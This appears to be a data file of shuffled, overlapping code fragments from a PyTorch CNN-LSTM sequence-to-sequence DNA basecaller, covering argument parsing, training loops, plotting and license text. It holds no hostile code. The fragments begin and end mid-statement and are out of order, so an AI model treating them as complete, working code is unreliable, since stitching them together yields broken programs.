"index=y_len_biases, columns=x_len) print(df_b.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df_b, linewidths=0.0, edgecolor=\"none\") figure2 = svm.get_figure() figure2.savefig(save_files_path",
"= F.tanh(cellgate) outgate = F.sigmoid(outgate) cy = (forgetgate * c) + (ingate *",
"divmod(rem, 60) print(\"=\" * 100) checkpoint = { 'updates': out12[-1], 'model': model12.state_dict(), 'optimizer':",
"Backward pass loss.backward() #clipping_value = 1 #arbitrary number of your choosing if clipping_value",
"layers!\" assert lstm_encoder.batch_size == lstm_decoder.batch_size, \"Encoder and decoder must have equal batch size!\"",
"for name in y_len: if \"bias\" in name and \"lstm\" in name and",
"# Define the LSTM layer self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=self.bidirectional, dropout=self.dropout)",
"seq, true_batch_size:max_seq_len, features filled with 0 outputs[i, 0:input_decoder.size(0), :] = input_decoder # [max.",
"1: plt.legend(bbox_to_anchor=(1.05, 1.05)) plt.title(\"{} {}\".format(label, title)) if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\")",
"self.bidirectional: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll",
"type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('-c', '--channel_number', type=int, default=256, help=\"Number of output channels",
"default=Range(0.0, 1.0), help=\"Dropout probability Encoder-LSTM\") parser.add_argument('-u', '--hidden_units', type=int, default=256, help=\"Number of hidden units",
"{:.6f}...\".format(epoch_loss / float(iteration + 1)), \"Accuarcy: {:.6f}...\".format((epoch_acc / float(iteration + 1)) * 100),",
"plt.clf() def bestPerformance2File(input, fname, editD=True): loss_train, loss_val, acc_train, acc_val, editd_train, editd_val = input[0],",
"= n//4, n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias))) print(start, end) #",
"batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else:",
"attention=attention, dropout=dropout) model12 = Seq2Seq(cnn_encoder = CNN, lstm_encoder = lstm, lstm_decoder = lstm_dec)#.cuda(port)",
"is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_train(input, pdf=None, editD=True): sns.set(font_scale=1) loss_train, acc_train,",
"file_name=save_files_path + \"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping, patience=patience_earlyStop, writer=writer, editD=editD) end = time.time() hours, rem =",
"editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))), label=\"training edit distance\") plt.xlabel(\"Updates\")",
"writer=\"\", editD=True, reduce_lr=False): #Print all of the hyperparameters of the training iteration: print(\"=====",
"list of conditions and the following disclaimer in the documentation and/or other materials",
"label_len_val, input_y10_val, batch_size=batch_size, shuffle=True) if earlyStopping: # initialize the early_stopping object early_stopping =",
"c = c.view(x.size(0), -1) x = x.view(x.size(0), -1) # Linear mappings gates =",
"TF on\") parser.add_argument('--weight_decay', type=float, default=0, help=\"Weight decay\") parser.add_argument('--learning_rate', type=float, default=0.001, help=\"Weight decay\") parser.add_argument(\"--reduce_lr\",",
"num_layers=num_layers, own_cell_decoder=False, bidirectional = bidir, port=port, attention=attention, dropout=dropout) model12 = Seq2Seq(cnn_encoder = CNN,",
"{ 'updates': out12[-1], 'model': model12.state_dict(), 'optimizer': optimizer._optimizer.state_dict()} torch.save(checkpoint, save_files_path + '{}.pt'.format(fname)) #np.savez_compressed(save_files_path +",
"packing operation unpacked, unpacked_len = nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True) # targets oder batch sortieren #",
"if updates % make_validation == 0: # ed = np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels, sorted_labels_len))) #",
"use predicted token onehot = torch.zeros(len(top1), self.output_dim).cuda(self.port) onehot[:, top1] = 1 # one",
"x in y_len] df = pd.DataFrame(input, index=y_len, columns=x_len) print(df.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df,",
"True input_decoder = torch.zeros(batch_size, self.input_dim).cuda(self.port) # SOS token = 1 [batch size, SOS",
"unpacked, unpacked_len = nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True) # targets oder batch sortieren # unsort the",
"# targets oder batch sortieren # unsort the output _, original_idx = sorted_idx.sort(0,",
"= seq_len_cnn > 0 seq_len_cnn = seq_len_cnn[negative_idx] in_lstm = in_lstm[negative_idx, : , :]",
"optim.SGD(model12.parameters(), lr=lr, momentum=0) else: optimizer = optim.Adam(model12.parameters(), lr=lr, weight_decay=weight_decay, betas=(0.9,0.999)) criterion = torch.nn.NLLLoss(ignore_index=5)#.cuda(port)",
"# one hot encode input input_decoder = label if teacher_force else onehot #",
"100) dict_validation_loss[epoch] = val_losses dict_validation_acc[epoch] = val_acc if editD: dict_validation_editd[epoch] = val_editd #",
"y_len_biases.append(name + \".\" + b) input_biases = np.zeros((len(y_len_biases), len(x_len))) input_grad_biases = np.zeros((len(y_len_biases), len(x_len)))",
"NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,",
"CNN input_bias_cnn = args.input_bias_cnn strides = args.strides kernel = args.kernel cnn_out = args.channel_number",
"if p == 4: break encoded_pred.append(vocab[int(p.item())]) encoded_pred = ''.join(encoded_pred) encoded_target = ''.join([vocab[int(x.item())] for",
"as return (torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port)) def forward(self, x, x_lengths): #hidden",
"(batch_size*seq, out_dim) input_decoder = F.log_softmax(lstm_in_unroll, dim=1) # (batch_size*seq, out_dim) --> (batch_size, out_dim) #decide",
"== 4: break encoded_pred.append(vocab[int(p.item())]) encoded_pred = ''.join(encoded_pred) encoded_target = ''.join([vocab[int(x.item())] for x in",
"writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates) if",
"'--output', required = True, help=\"Output folder name\") parser.add_argument('-g', '--gpu_port', type=int, default=1, help=\"Port on",
"\"None\": nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value)) # Update encoder and decoder optimizer.step() if (val_ds != None)",
"loss_val[max_idx_val], max_idx_val)) f.close() def basecalling(argv): parser = make_argparser() args = parser.parse_args(argv[1:]) infile =",
"= (forgetgate * c) + (ingate * cellgate) hy = outgate * F.tanh(cy)",
"train_set = [train_set[0].cuda(port), train_set[1].cuda(port), train_set[2].cuda(port), train_set[3].cuda(port), train_set[4].cuda(port), train_set[5].cuda(port)] val_set = [val_set[0].cuda(port), val_set[1].cuda(port), val_set[2].cuda(port),",
"type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) return parser # Network # ----------- # *",
"random.random() < teacher_forcing_ratio # put on position: seq, 0:true_batch_size, features # rest: seq,",
"nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value)) # Update encoder and decoder optimizer.step() if (val_ds != None) and",
"Accuracy: {:.6f}%...\".format((epoch_acc_val / float(iteration_val + 1)) * 100)) print(\"=\" * 100) dict_validation_loss[epoch] =",
"bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))), label=\"training",
"lab_len[negative_idx] labels = labels[negative_idx, :] labels10 = labels10[negative_idx, :, :] encoder_hidden, ecoder_output =",
"(unsorted_hiddens1, unsorted_hiddens2)#.cpu() unpacked_original = unpacked[original_idx, :, :] return hidden_original, unpacked_original # The Decoder",
"# Update encoder and decoder optimizer.step() if (val_ds != None) and (updates %",
"np.linalg.norm(m, ord=2) if split_LSTMbiases and \"bias\" in p and \"lstm\" in p and",
"False, bidirectional = False, port=1, attention=True, dropout=0): super(LSTMdecoder, self).__init__() self.input_dim = input_dim self.hidden_dim",
"(torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMdecoder(nn.Module): def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2,",
":] sorted_hiddens2 = encoder_hidden[1][:, sorted_idx_target, :] sorted_hiddens = (sorted_hiddens1, sorted_hiddens2) sorted_encoder_output = ecoder_output[sorted_idx_target,",
"############################# ########################################### #### LSTM random_value = random.random() out_decoder, decoder_hidden = self.lstm_decoder( sorted_encoder_output, seq_len_cnn,",
"{} dict_validation_acc = {} dict_training_editd = {} dict_validation_editd = {} dict_training_loss2 = {}",
"label = y[not_padded_batches, :, i] # batch-i, features, seq len y = y[not_padded_batches,",
"torch.autograd import Variable import torch.nn.functional as F import torchvision import pickle import random",
"break model.train() epoch_loss = 0 epoch_acc = 0 epoch_loss_val = 0 epoch_acc_val =",
"validation set val_losses = [] val_acc = [] val_editd = [] model.eval() total_ed",
"1: nn.init.orthogonal_(param.data) def plot_error_accuarcy(input, pdf=None, steps=50, validation=True, editD=True): sns.set(font_scale=1) loss_train, loss_val, acc_train, acc_val,",
"[] for p in seq: if p == 4: break encoded_pred.append(vocab[int(p.item())]) encoded_pred =",
"n_layers_cnn = args.cnn_layers batch_normalization = args.batch_norm dropout_on = args.dropout_cnn dropout_input = args.dropout_input dropout_probability",
"self.h2h(h) ingate, forgetgate, cellgate, outgate = gates.chunk(4, 1) ingate = F.sigmoid(ingate) forgetgate =",
"c.view(x.size(0), -1) x = x.view(x.size(0), -1) # Linear mappings gates = self.i2h(x) +",
"1 # one hot encode input input_decoder = label if teacher_force else onehot",
"b in [\"input\", \"forget\", \"cell\", \"output\"]: y_len_biases.append(name + \".\" + b) input_biases =",
"default=25, help=\"Patience in early stopping\") parser.add_argument(\"--call\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--editD\", type=lambda",
"torch.optim as optim from torch.utils.data import Dataset, DataLoader from sklearn.preprocessing import LabelEncoder from",
"itertools import seaborn as sns import pandas as pd import argparse from distutils.util",
"input_dim] # undo the packing operation unpacked, unpacked_len = nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True) # targets",
"11, 11], help=\"Kernel sizes in Encoder-CNN\") parser.add_argument(\"--dropout_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--dropout_input\",",
"ed # editd_iteration.append(ed2) # print(\"edit distance= {0:.4f}\".format((epoch_editd / float(iteration + 1)))) if updates",
"sortieren # unsort the output _, original_idx = sorted_idx.sort(0, descending=False) # unsort hiddens",
"of not padded sequences true_y_len = true_y_len[not_padded_batches] # remove smallest element = last",
"out_dim) input_decoder = F.log_softmax(lstm_in_unroll, dim=1) # (batch_size*seq, out_dim) --> (batch_size, out_dim) #decide if",
"#if updates > int((len(train_loader) * n_epochs)*0.5) and teacher_forcing_ratio >= 0.5: if (running_acc_train /",
"Load data dict_classes = {0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4:",
"Distance vs. updates from trainings set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\")",
"help=\"Kernel sizes in Encoder-CNN\") parser.add_argument(\"--dropout_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--dropout_input\", type=lambda x:bool(strtobool(x)),",
"x_lengths) sorted_len, sorted_idx = x_lengths.sort(0, descending=True) index_sorted_idx = sorted_idx.view(-1, 1, 1).expand_as(x) sorted_inputs =",
"OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY",
"THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH",
"figure.savefig(save_files_path + \"/heatmap_{}.pdf\".format(filename)) plt.clf() if split_LSTMbiases: y_len_biases = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]), x.split(\".\")[2]]) for x",
"model12 = Seq2Seq(cnn_encoder = CNN, lstm_encoder = lstm, lstm_decoder = lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm) for",
"set\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))), label=\"training edit",
"OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY",
"hidden: 2,b,hidden attn_applied = torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:, i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder = torch.cat((input_decoder, attn_applied.squeeze(1)), dim=1)",
"batch_size, output_dim=5, num_layers=2, own_cell_decoder = False, bidirectional = False, port=1, attention=True, dropout=0): super(LSTMdecoder,",
"default=500, help=\"Number of epochs\") parser.add_argument('-v', '--make_validation', type=int, default=1000, help=\"Make every n updates evaluation",
"args.input fname = args.output port = args.gpu_port SEED = args.set_seed batch = args.batch_size",
"forget_bias = args.forget_bias_encoder forget_bias_decoder = args.forget_bias_decoder num_layers = args.lstm_layers bidir = args.bi_lstm attention",
"train_set[4].size(), train_set[5].size()) print(\"validation: \", val_set[0].size(), val_set[1].size(), val_set[2].size(), val_set[3].size(), val_set[4].size(), val_set[5].size()) # [batch size]",
"= lstm_encoder self.lstm_decoder = lstm_decoder assert lstm_encoder.hidden_dim == lstm_decoder.hidden_dim, \"Hidden dimensions of encoder",
"= train_ds[2] signal_len = train_ds[3] label_len = train_ds[4] read_train = train_ds[5] #Get training",
"seq_len_cnn[negative_idx] in_lstm = in_lstm[negative_idx, : , :] # [batch, seq_len, input_dim] lab_len =",
"print(\"=\" * 100) print(\"Epoch: {}/{}...\".format(epoch+1, n_epochs), \"Loss: {:.6f}...\".format(epoch_loss / float(iteration + 1)), \"Accuarcy:",
"both have shape (num_layers, batch_size, hidden_dim). # Sort instances by sequence length in",
"in epoch {}/{}\".format(iteration+1, epoch+1, n_epochs)) print(\"=\" * 30) print(\"loss= {0:.4f}\".format(epoch_loss / float(iteration +",
"[batch, seq_len, input_dim] # pack_padded_sequence so that padded items in the sequence won't",
"nicht one-hot encoden reshaped_output_val = output_val.view(-1, output_val.size(2)) reshaped_sorted_labels_val = sorted_labels_val.view(-1) notpadded_index_val = reshaped_sorted_labels_val",
"performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\")",
"updates % make_validation == 0: print(\"=\" * 30) print(\"batch {} in epoch {}/{}\".format(iteration+1,",
"dict_validation_acc, dict_training_editd, dict_validation_editd], [dict_training_loss2, dict_validation_loss2, dict_training_acc2, dict_validation_acc2, dict_training_editd2, dict_validation_editd2], [dict_activations_in, dict_activations_forget, dict_activations_cell, dict_activations_out],",
"args.weight_decay #0.01 #0.01 clipping_value = args.gradient_clip # LSTM hidden = args.hidden_units #256 forget_bias",
"+= loss_val.item() acc_val = (reshaped_output_val[notpadded_index_val, :].argmax(1) == reshaped_sorted_labels_val[notpadded_index_val] ).sum().item() / reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val +=",
"= train_ds[1] input_y10 = train_ds[2] signal_len = train_ds[3] label_len = train_ds[4] read_train =",
"running_acc_train += acc acc_iteration.append(acc) #if editD: # if updates % make_validation == 0:",
"x_lengths): #hidden = self.init_hidden() # Forward pass through LSTM layer # shape of",
"val_set[0].size(), val_set[1].size(), val_set[2].size(), val_set[3].size(), val_set[4].size(), val_set[5].size()) # [batch size] is typically chosen between",
"edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], editd_train[max_idx_val], editd_val[max_idx_val], max_idx_val)) else: f.write(\"best",
"sig_len, tensor_y, label_len, label10, read_idx, batch_size, shuffle=False): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len,",
"# CNN arguments parser.add_argument(\"--input_bias_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('-c', '--channel_number', type=int, default=256,",
"class LSTMdecoder(nn.Module): def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_decoder = False, bidirectional",
"b) input_biases = np.zeros((len(y_len_biases), len(x_len))) input_grad_biases = np.zeros((len(y_len_biases), len(x_len))) for idx, u in",
"with PdfPages(save_files_path + \"{}.pdf\".format(fname)) as pdf: plot_error_accuarcy(out12[1], pdf, editD=editD) bestPerformance2File(out12[1], save_files_path + \"best_performances_{}.txt\".format(fname),",
"distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], editd_train[max_idx_val], editd_val[max_idx_val], max_idx_val)) else: f.write(\"best performances on trainings",
"= cnn_encoder self.lstm_encoder = lstm_encoder self.lstm_decoder = lstm_decoder assert lstm_encoder.hidden_dim == lstm_decoder.hidden_dim, \"Hidden",
"sort labels so that they match with order in batch labels_sorted = labels[sorted_idx_target,",
"print(\"=\" * 30) print(\"epoch {}/{}\".format(epoch+1, n_epochs)) print(\"=\" * 30) total_train_loss = 0 loss_iteration",
"x.split(\".\")[3]]), x.split(\".\")[2]]) for x in y_len_biases] df_b = pd.DataFrame(input_biases, index=y_len_biases, columns=x_len) print(df_b.head()) sns.set(font_scale=0.4)",
"input_biases = np.zeros((len(y_len_biases), len(x_len))) input_grad_biases = np.zeros((len(y_len_biases), len(x_len))) for idx, u in enumerate(x_len):",
"1)) * 100), \"Val Loss: {:.6f}...\".format(epoch_loss_val / float(iteration_val + 1)), \"Val Accuracy: {:.6f}%...\".format((epoch_acc_val",
"in a Variable object inputs, labels, labels10 = Variable(batch_x, requires_grad=False), Variable(batch_y, requires_grad=False), Variable(batch_y10,",
"Variable(batch_x, requires_grad=False), Variable(batch_y, requires_grad=False), Variable(batch_y10, requires_grad=False) # batch_size x out_size x seq_length output,",
"the updates teacher_forcing_ratio = teacher_forcing_ratio * 0.95 else: teacher_forcing_ratio # Evaluation on the",
"True, help=\"Output folder name\") parser.add_argument('-g', '--gpu_port', type=int, default=1, help=\"Port on GPU mode\") parser.add_argument('-s',",
"label_len, input_y10, batch_size=batch_size, shuffle=True) if val_ds != None: val_loader = get_train_loader_trainVal(input_x_val, signal_len_val, input_y_val,",
"[] acc_iteration = [] editd_iteration = [] for iteration, data in enumerate(train_loader): model.train()",
"parser.add_argument('-b', '--batch_size', type=int, default=256, help=\"Batch size\") parser.add_argument('-e', '--epochs', type=int, default=500, help=\"Number of epochs\")",
"\"Val Accuracy: {:.6f}%...\".format((epoch_acc_val / float(iteration_val + 1)) * 100)) print(\"=\" * 100) dict_validation_loss[epoch]",
"the pickle input file.\") parser.add_argument('-o', '--output', required = True, help=\"Output folder name\") parser.add_argument('-g',",
"= args.bi_lstm attention = args.attention dropout = args.dropout # CNN input_bias_cnn = args.input_bias_cnn",
"seaborn as sns import pandas as pd import argparse from distutils.util import strtobool",
"4, 1) #self.attn = nn.Linear(self.hidden_dim * 4, self.hidden_dim * 2) self.linear = nn.Linear(self.hidden_dim*2,",
"plt.title(\"Accuracy vs. updates from validation set\") if editD: ax = fig.add_subplot(1, 3, 3)",
"hidden1 = hidden[0] hidden2 = hidden[1] h1 = torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]], 2) h2 =",
"train_ds[1] input_y10 = train_ds[2] signal_len = train_ds[3] label_len = train_ds[4] read_train = train_ds[5]",
"ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))), label=\"training edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized",
"if \"bias\" in name: if forget_bias != \"None\" and \"lstm_encoder\" in name: print(name,param.data.size())",
"outgate param.data[start:end].fill_(float(int(forget_bias))) print(start, end) # ingate start, end = 0, n//4 # ordering",
"# input for LSTM seq_length x out_size # Calculate cross entropy loss #",
"in batch labels_sorted = labels[sorted_idx_target, :]#.gather(0, sorted_idx_lab.long()) labels10_sorted = labels10[sorted_idx_target, :, :] #",
"editd_val = input[0], input[1], input[2], input[3], input[4], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1,",
"parser.add_argument('--drop_prob', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-CNN\") parser.add_argument(\"--batch_norm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False)",
"0: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch), color=\"#000000\", alpha=0.8) else: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update",
"dict_validation_loss[epoch] = val_losses dict_validation_acc[epoch] = val_acc if editD: dict_validation_editd[epoch] = val_editd # early_stopping",
"editdistance vocab = {0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOS>\",",
"1: # (256, 1, 11) m = matrix_param[p].reshape((matrix_param[p].shape[0], -1)) else: m = matrix_param[p]",
"# [max. target length, batch size, hidden dim] max_in_batch = int(max(true_y_len.cpu())) start_seq =",
"encoden reshaped_output = output.view(-1, output.size(2)) reshaped_sorted_labels = sorted_labels.view(-1) notpadded_index = reshaped_sorted_labels != 5",
"val_set[2].size(), val_set[3].size(), val_set[4].size(), val_set[5].size()) # [batch size] is typically chosen between 1 and",
"# Define the LSTM layer if self.bidirectional: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2,",
"size] is typically chosen between 1 and a few hundreds, e.g. [batch size]",
"__init__(self, input_size, hidden_size, bias=True, port=1): super(LSTMCellDecoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size",
"counter_updates_teacherForcing = 0 old_ed = 0 if reduce_lr: scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') #Loop",
"= [] editd_iteration = [] for iteration, data in enumerate(train_loader): model.train() #Set the",
"pdf=None, editD=True): sns.set(font_scale=1) loss_val, acc_val, editd_val = input[1], input[3], input[5] fig = plt.figure(figsize=(18,2))",
"= 0.0 running_editd_train = 0.0 running_editd_val = 0.0 print(\"=\" * 100) print(\"Epoch: {}/{}...\".format(epoch+1,",
"self.port = port self.dropout=dropout # Define the LSTM layer self.lstm = nn.LSTM(self.input_dim, self.hidden_dim,",
"= y[not_padded_batches, :, :] # batch-i, features, seq len encoder_outputs = encoder_outputs[not_padded_batches, :,",
"[batch size, SOS token] for i in max_for: # Stop looping if we",
"that the following conditions are met: 1. Redistributions of source code must retain",
"decoder must have equal batch size!\" def forward(self, inputs, seq_len, teacher_forcing_ratio, labels=None, lab_len=None,",
"+ \"{}.pdf\".format(fname)) as pdf: plot_error_accuarcy(out12[1], pdf, editD=editD) bestPerformance2File(out12[1], save_files_path + \"best_performances_{}.txt\".format(fname), editD=editD) plot_error_accuarcy_iterations_train(out12[0],",
"num_layers self.output_dim = output_dim self.own_cell_encoder = own_cell_encoder self.bidirectional = bidirectional self.port = port",
"nargs='?', const=True, default=True) parser.add_argument('--dropout', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-LSTM\") parser.add_argument('-u', '--hidden_units', type=int,",
"= nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) # Define the output layer if",
"must have equal number of layers!\" assert lstm_encoder.batch_size == lstm_decoder.batch_size, \"Encoder and decoder",
"editd = 0 num_chars = 0 for idx, length in enumerate(target_lengths): length =",
"3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))), label=\"training edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit",
"= pd.DataFrame(input_biases, index=y_len_biases, columns=x_len) print(df_b.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df_b, linewidths=0.0, edgecolor=\"none\") figure2 =",
"100)) print(\"=\" * 100) dict_validation_loss[epoch] = val_losses dict_validation_acc[epoch] = val_acc if editD: dict_validation_editd[epoch]",
"\", val_set[0].size(), val_set[1].size(), val_set[2].size(), val_set[3].size(), val_set[4].size(), val_set[5].size()) # [batch size] is typically chosen",
"teacher_forcing_ratio # put on position: seq, 0:true_batch_size, features # rest: seq, true_batch_size:max_seq_len, features",
"writer=writer, editD=editD) end = time.time() hours, rem = divmod(end-start, 3600) minutes, seconds =",
"= 1 #arbitrary number of your choosing if clipping_value != \"None\": nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value))",
"signal_len_val = val_ds[3] label_len_val = val_ds[4] read_val = val_ds[5] input_x = train_ds[0] input_y",
"earlyStopping=False, writer=\"\", editD=True, reduce_lr=False): #Print all of the hyperparameters of the training iteration:",
"infile print(file_out) with open(file_out, 'rb') as handle: read_data = pickle.load(handle) save_files_path = script_dir",
"THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.",
"labels_sorted, sorted_len_target # In[ ]: def get_train_loader_trainVal(tensor_x, sig_len, tensor_y, label_len, label10, batch_size, shuffle=True):",
"forgetgate, cellgate, outgate = gates.chunk(4, 1) ingate = F.sigmoid(ingate) forgetgate = F.sigmoid(forgetgate) cellgate",
"MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL",
"or epoch == max(p.keys()): x = np.arange(0, len(p[epoch].detach().numpy())) # this locator puts ticks",
"in model12.named_parameters(): if \"bias\" in name: if forget_bias != \"None\" and \"lstm_encoder\" in",
"acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], editd_train[max_idx_train], editd_val[max_idx_train],",
"h = h.view(x.size(0), -1) c = c.view(x.size(0), -1) x = x.view(x.size(0), -1) #",
"file_name=\"model\", earlyStopping=False, writer=\"\", editD=True, reduce_lr=False): #Print all of the hyperparameters of the training",
"'--set_seed', type=int, default=1234, help=\"Set seed\") parser.add_argument('-b', '--batch_size', type=int, default=256, help=\"Batch size\") parser.add_argument('-e', '--epochs',",
"in p and \"linear\" not in p: n = matrix_param[p].shape[0] # input gate",
"ax.plot(list(acc_val.keys()), [v*100 for v in list(acc_val.values())], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend()",
"ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) # cellgate, outgate start, end",
"out_channels = CNN.output_channel[n_layers_cnn-1] lstm = LSTMencoder(input_dim=out_channels, hidden_dim = hidden, batch_size=batch, output_dim=hidden, num_layers=num_layers, own_cell_encoder=False,",
"= CNN, lstm_encoder = lstm, lstm_decoder = lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm) for name, param in",
"+= loss.item() running_loss_train += loss.item() acc = (reshaped_output[notpadded_index, :].argmax(1) == reshaped_sorted_labels[notpadded_index] ).sum().item() /",
"won't be shown to the LSTM packed_seq = nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(), batch_first=True) # Define",
"np.mean(val_acc), updates) if editD: #writer.add_scalar('Edit Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates]",
"padded elements loss_val = criterion(reshaped_output_val, reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item()) epoch_loss_val += loss_val.item() running_loss_val += loss_val.item()",
"(seq*batch, out dim), target = (seq*batch) # Target nicht one-hot encoden reshaped_output_val =",
"acc_train[k]) max_idx_val = max(acc_val, key=lambda k: acc_val[k]) f = open(fname, \"w\") if editD:",
"#/ float(make_validation) dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] =",
"os import sys import torch import torch.nn as nn from torch.autograd import Variable",
"self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim, self.num_layers,",
"= convert_to_string(output_val.argmax(2), sorted_labels_val, sorted_labels_len_val) epoch_editd_val += ed_val running_editd_val += ed_val val_editd.append(ed_val) total_ed +=",
"torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]], 2) hidden = (h1, h2) batch_size = true_y_len.size(0) max_for = range(max_label_len)",
"OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL",
"+= acc acc_iteration.append(acc) #if editD: # if updates % make_validation == 0: #",
